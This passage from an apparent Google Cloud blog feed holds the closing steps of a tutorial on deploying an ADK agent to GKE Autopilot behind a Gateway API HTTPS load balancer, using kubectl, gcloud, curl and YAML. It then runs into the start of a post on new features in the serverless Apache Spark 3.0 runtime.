&lt;pre class="language-bash"&gt;&lt;code&gt;kubectl apply -f deployment.yaml&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Check the status of the deployment:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;kubectl get pods -w&lt;/code&gt;&lt;/pre&gt;
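&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you prefer a command that exits on its own instead of watching the pod list, the following sketch may help. It assumes the resource names from &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;deployment.yaml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; above and the default namespace; the 180-second timeout is an arbitrary illustrative value, not a recommendation.&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;# Block until the rollout completes or the (illustrative) timeout expires
kubectl rollout status deployment/adk-agent --timeout=180s

# Confirm the Workload Identity annotation is present on the Kubernetes service account
kubectl get serviceaccount adk-ksa -o yaml

# If a pod does not become ready, the container logs are a reasonable first place to look
kubectl logs deployment/adk-agent&lt;/code&gt;&lt;/pre&gt;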
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Once the pods are running, you can use kubectl port-forward to access the agent locally:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;kubectl port-forward svc/adk-service 8080:80&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Because we deployed the agent without the Web UI, there is nothing to browse at &lt;/span&gt;&lt;a href="http://localhost:8080" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;http://localhost:8080&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. However, we can still interact with it through the API using &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;curl&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In a new terminal, run the following commands:&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;# Create a new session
curl -X POST http://localhost:8080/apps/weather_agent/users/u_123/sessions/s_123

# Run a message
curl -s -X POST http://localhost:8080/run \
-H "Content-Type: application/json" \
-d '{
"appName": "weather_agent",
"userId": "u_123",
"sessionId": "s_123",
"newMessage": {
    "role": "user",
    "parts": [{
    "text": "Hey whats the weather in new york today"
    }]
}
}' | jq .&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;curl&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; command returns the response as JSON, and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;jq&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; pretty-prints it so that it is easier to read. You should see a response like:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-plain"&gt;&lt;code&gt;{
    "sessionId": "s_123",
    "messages": [
        {
            "role": "assistant",
            "parts": [
                {
                    "text": "The weather in New York today is sunny with a high of 90 degrees Fahrenheit."
                }
            ]
        }
    ]
}&lt;/code&gt;&lt;/pre&gt;
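&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you only want the reply text, a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;jq&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; filter can extract it. This is a minimal sketch that assumes the response has exactly the shape shown above; if your ADK version returns a different structure, the filter path will need adjusting.&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;# Send a message and print only the text parts of the reply
# (the filter path assumes the response shape shown above)
curl -s -X POST http://localhost:8080/run \
-H "Content-Type: application/json" \
-d '{"appName": "weather_agent", "userId": "u_123", "sessionId": "s_123", "newMessage": {"role": "user", "parts": [{"text": "Hey whats the weather in new york today"}]}}' \
| jq -r '.messages[].parts[].text'&lt;/code&gt;&lt;/pre&gt;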
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;(Optional) Step 7: Exposing via Gateway API and HTTPS load balancer&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finally, we expose the agent using the GKE Gateway API with a Google-managed TLS certificate. This is the recommended, production-grade approach — Google will automatically provision and renew the certificate for your domain.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;NB: GKE supports other options to provision certificates. You can use Let's Encrypt with cert-manager, pre-shared certificates, or any other certificate authority. You can check the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/secure-gateway#secure-using-ssl-certificate"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GKE documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for more details.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;First, reserve a static IP address for your load balancer:&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud compute addresses create adk-agent-ip --global
export AGENT_IP=$(gcloud compute addresses describe adk-agent-ip --global --format="value(address)")
echo "Your IP: $AGENT_IP"&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Point your domain's DNS &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;A&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; record at &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;$AGENT_IP&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. This guide uses &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;api.yourdomain.com&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; as the example hostname.&lt;/span&gt;&lt;/p&gt;
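&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Managed certificates are only issued once the domain resolves to the load balancer, so it can be worth confirming the DNS record before continuing. The sketch below assumes &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;dig&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; is installed locally; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;DOMAIN&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; is a placeholder variable introduced here for illustration.&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;# DOMAIN is a placeholder: set it to the hostname you pointed at the load balancer
export DOMAIN=api.yourdomain.com

# Print the address the domain currently resolves to
dig +short "$DOMAIN"

# The output above should match the reserved address
echo "Expected: $AGENT_IP"&lt;/code&gt;&lt;/pre&gt;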
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a Google-managed certificate. Replace &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;api.yourdomain.com&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with your actual domain; it must match the hostname used in the HTTPRoute:&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud compute ssl-certificates create adk-cert --domains api.yourdomain.com --global&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gateway.yaml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with the following content:&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-plain"&gt;&lt;code&gt;# Gateway: HTTPS load balancer with the managed certificate and static IP
apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: adk-gateway
spec:
  gatewayClassName: gke-l7-global-external-managed
  listeners:
  - name: https
    protocol: HTTPS
    port: 443
    tls:
      mode: Terminate
      options:
        networking.gke.io/pre-shared-certs: adk-cert
  addresses:
  - type: NamedAddress
    value: adk-agent-ip
---
# HTTPRoute: forward traffic to the ADK service
apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: adk-route
spec:
  parentRefs:
  - name: adk-gateway
  hostnames:
  - "api.yourdomain.com"
  rules:
  - backendRefs:
    - name: adk-service
      port: 80
---
apiVersion: networking.gke.io/v1
kind: HealthCheckPolicy
metadata:
  name: adk-health
  namespace: default
spec:
  default:
    checkIntervalSec: 15
    timeoutSec: 5
    healthyThreshold: 1
    unhealthyThreshold: 2
    logConfig:
      enabled: false
    config:
      type: HTTP
      httpHealthCheck:
        port: 8080
        requestPath: /health
  targetRef:
    group: ""
    kind: Service
    name: adk-service&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Apply the configuration:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;kubectl apply -f gateway.yaml&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Certificate provisioning can take up to 20 minutes. Monitor the status with:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud compute ssl-certificates describe adk-cert --global&lt;/code&gt;&lt;/pre&gt;
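&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To narrow the output to the fields that matter while you wait, the following sketch may be useful. It assumes the resource names used in &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gateway.yaml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and the default namespace.&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;# Print only the managed certificate status (for example PROVISIONING or ACTIVE)
gcloud compute ssl-certificates describe adk-cert --global --format="get(managed.status)"

# Check whether the Gateway has been programmed and assigned an address
kubectl get gateway adk-gateway

# Inspect the route's conditions if traffic is not reaching the service
kubectl describe httproute adk-route&lt;/code&gt;&lt;/pre&gt;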
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Once the managed status shows &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ACTIVE&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, your agent is live at &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;https://api.yourdomain.com&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. You can test it with:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;# Create a new session
curl -X POST https://api.yourdomain.com/apps/weather_agent/users/u_124/sessions/s_124

# Run a message
curl -s -X POST https://api.yourdomain.com/run \
-H "Content-Type: application/json" \
-d '{
"appName": "weather_agent",
"userId": "u_124",
"sessionId": "s_124",
"newMessage": {
    "role": "user",
    "parts": [{
    "text": "Hey whats the weather in new york today"
    }]
}
}' | jq .&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Conclusion &amp;amp; Looking Ahead&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By following these steps, you have successfully deployed a production-ready AI agent built with ADK onto GKE Autopilot that invokes Gemini on Vertex AI with Workload Identity for authentication. This setup ensures that your agent can scale horizontally to meet demand while maintaining a high security posture.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As you look ahead, consider integrating more complex tools or leveraging GKE's multi-cluster capabilities for even greater resilience. For more details on the technologies used here, explore the official &lt;/span&gt;&lt;a href="https://cloud.google.com/kubernetes-engine/docs"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GKE documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and the &lt;/span&gt;&lt;a href="https://github.com/google/adk" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ADK repository&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
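&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To avoid ongoing charges, remember to delete the resources created in this guide when you are finished, including the Gateway, the static IP address, the certificate, the GKE cluster, and the Artifact Registry repository:&lt;/span&gt;&lt;/p&gt;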
&lt;pre class="language-bash"&gt;&lt;code&gt;kubectl delete -f gateway.yaml
kubectl delete -f deployment.yaml
gcloud compute addresses delete adk-agent-ip --global
gcloud compute ssl-certificates delete adk-cert --global
gcloud container clusters delete $CLUSTER_NAME --region $REGION
gcloud artifacts repositories delete adk-repo --location $REGION&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description><pubDate>Thu, 04 Jun 2026 07:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/developers-practitioners/scaling-ai-agents-a-step-by-step-guide-to-deploying-adk-on-gke-autopilot/</guid><category>Developers &amp; Practitioners</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/Blog_Hero_Image_Resizing.max-600x600.png" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Scaling AI Agents: A Step-by-Step Guide to Deploying ADK on GKE Autopilot</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/Blog_Hero_Image_Resizing.max-600x600.png</image><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/developers-practitioners/scaling-ai-agents-a-step-by-step-guide-to-deploying-adk-on-gke-autopilot/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Abdel Sghiouar</name><title>Senior Cloud Developer Advocate</title><department></department><company></company></author></item><item><title>What’s new in serverless Managed Service for Apache Spark</title><link>https://cloud.google.com/blog/products/data-analytics/serverless-managed-service-for-apache-spark-runtime-3-0-features/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Whether you use it for data preparation, real-time interactive queries, AI model training, or something entirely different, running Apache Spark at scale is demanding — you shouldn’t have to manage the underlying infrastructure too.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Late last year, we &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc-serverless/docs/release-notes#December_04_2025"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;announced&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; the general availability (GA) of our serverless &lt;/span&gt;&lt;a href="https://cloud.google.com/products/managed-service-for-apache-spark"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Managed Service for Apache Spark&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; runtime version 3.0, prioritizing speed, simplicity, and reliability. Since then, customer use of Managed Service for Apache Spark for data science has nearly doubled year over year. This reinforces our belief that Google Cloud is the easier, smarter, and faster place to run your Apache Spark workloads. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, let’s dive into a few key features that make our serverless Apache Spark offering a great fit for a wide range of workflows, including feature engineering, GPU-accelerated model training and tuning, semantic search, RAG, building AI agents and applications, and more.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Zero-setup onboarding&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The most significant barrier to entry for a cloud service is often the "time to magic moment" — the interval between creating a project and running your first workload. Previously, with serverless Spark, you still needed to manually configure IAM roles, VPC networking, and firewall rules before submitting a single job.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the serverless Spark 3.0 runtime version, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;zero-setup onboarding&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; significantly reduces the time to launch your first workload on serverless Spark. It does so by automating the following steps:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Permissions:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Necessary IAM roles and permissions are automatically provisioned to the appropriate service accounts.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Networking:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc-serverless/docs/concepts/network#private-google-access-requirement"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Private Google Access&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is auto-enabled on subnets, and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc-serverless/docs/concepts/network#automatically_created_regional_system_firewall_policy"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;system firewall policies&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; are configured automatically.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;API management&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Enabling APIs is now more efficient; you can just enable the Managed Service for Apache Spark API instead of manually having to enable several different APIs, as you did previously.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Fast startup for SLA-sensitive workloads&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Latency matters, especially for interactive data science and SLA-sensitive batch pipelines. Historically, serverless Spark startup could take several minutes. With the 3.0 runtime, we’ve cut startup times by 75% across both standard and premium tiers. The improvement applies automatically, without any code or configuration changes, and at no additional cost. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This massive improvement qualifies serverless Spark for a much broader range of SLA-sensitive workloads, and we’re always looking to optimize startup times even further. &lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"Serverless Spark allowed us to quickly reap benefits by removing the need for fine-grain machine management. This drove faster model development and significantly reduced our data processing costs." &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;- César Narnajo, Principal Engineer, Moloco&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee"
      href="https://youtube.com/watch?v=190tVajZgRI"
      data-glue-modal-trigger="uni-modal-190tVajZgRI-"
      data-glue-modal-disabled-on-mobile="true"&gt;

      
        

        &lt;div class="article-video__aspect-image"
          style="background-image: url(https://storage.googleapis.com/gweb-cloudblog-publish/images/yt_SnqmNb0.max-1000x1000.png);"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Serverless data science: Seamless AI workflows with Spark and BigQuery&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg role="img" class="h-c-video__play h-c-icon h-c-icon--color-white"&gt;
        &lt;use xlink:href="#mi-youtube-icon"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"
     data-glue-modal="uni-modal-190tVajZgRI-"
     data-glue-modal-close-label="Close Dialog"&gt;
   &lt;a class="glue-yt-video"
      data-glue-yt-video-autoplay="true"
      data-glue-yt-video-height="99%"
      data-glue-yt-video-vid="190tVajZgRI"
      data-glue-yt-video-width="100%"
      href="https://youtube.com/watch?v=190tVajZgRI"
      ng-cloak&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Better GPU obtainability&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Support for &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/managed-spark/docs/guides/dws-serverless"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Dynamic Workload Scheduler (DWS)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; Flex Start Mode in the serverless 3.0 runtime version allows serverless Spark to queue customer requests for a configurable duration when GPUs are unavailable. This feature addresses the obtainability challenges for high-demand accelerators like NVIDIA A100 and L4, which are subject to frequent regional shortages. By queuing workloads with DWS until the necessary GPU capacity becomes available, you can dramatically increase obtainability and reliability for your latency-sensitive AI/ML workloads.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_L0aDvOP.max-1000x1000.jpg"
        
          alt="1"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;First-class support for Apache Spark 4.x&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The s&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;erverless Spark 3.0 runtime version supports current and upcoming &lt;/span&gt;&lt;a href="https://spark.apache.org/releases/spark-release-4-0-0.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Apache Spark 4.x&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; innovations, including Spark Connect, which supports a decoupled client-server architecture that enables remote connectivity from any client.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Enhanced multi-zonal support&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To protect global enterprise workloads from zonal outages or hardware stockouts, the serverless Spark 3.0 runtime introduces enhanced multi-zonal support by default. The service can now automatically allocate execution nodes across multiple zones within a single region to help ensure obtainability.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Crucially, we do not charge for cross-zonal network traffic between nodes in a region, providing &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;high availability without the traditional multi-zone tax.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This is another benefit that you can realize by bringing your global Apache Spark workloads to Google Cloud.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_2SbCvxI.max-1000x1000.png"
        
          alt="2"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Looking ahead&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In addition to&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; the above, we’re also continuing to innovate and push the boundaries of ease of use in areas such as history-based &lt;/span&gt;&lt;a href="https://medium.com/google-cloud/a-google-engineers-take-on-a-common-spark-problem-and-how-we-re-fixing-it-44b26293cce0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;autotuning&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and goal-based &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/managed-spark/docs/concepts/autoscaling-serverless#profiles"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;autoscaling&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can take advantage of these features today by specifying &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;runtime_version: 3.0&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; in your batch workloads or interactive sessions. To run your first workload on serverless Spark, complete the following steps:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/flows/enableapi?apiid=dataproc"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Managed Service for Apache Spark API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;If you aren’t the project owner, ask your project admin for the serverless Managed Service for Apache Spark &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/roles-permissions/dataproc#dataproc.serverlessEditor"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Editor &lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;(&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;roles/dataproc.serverlessEditor&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) role on the project.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
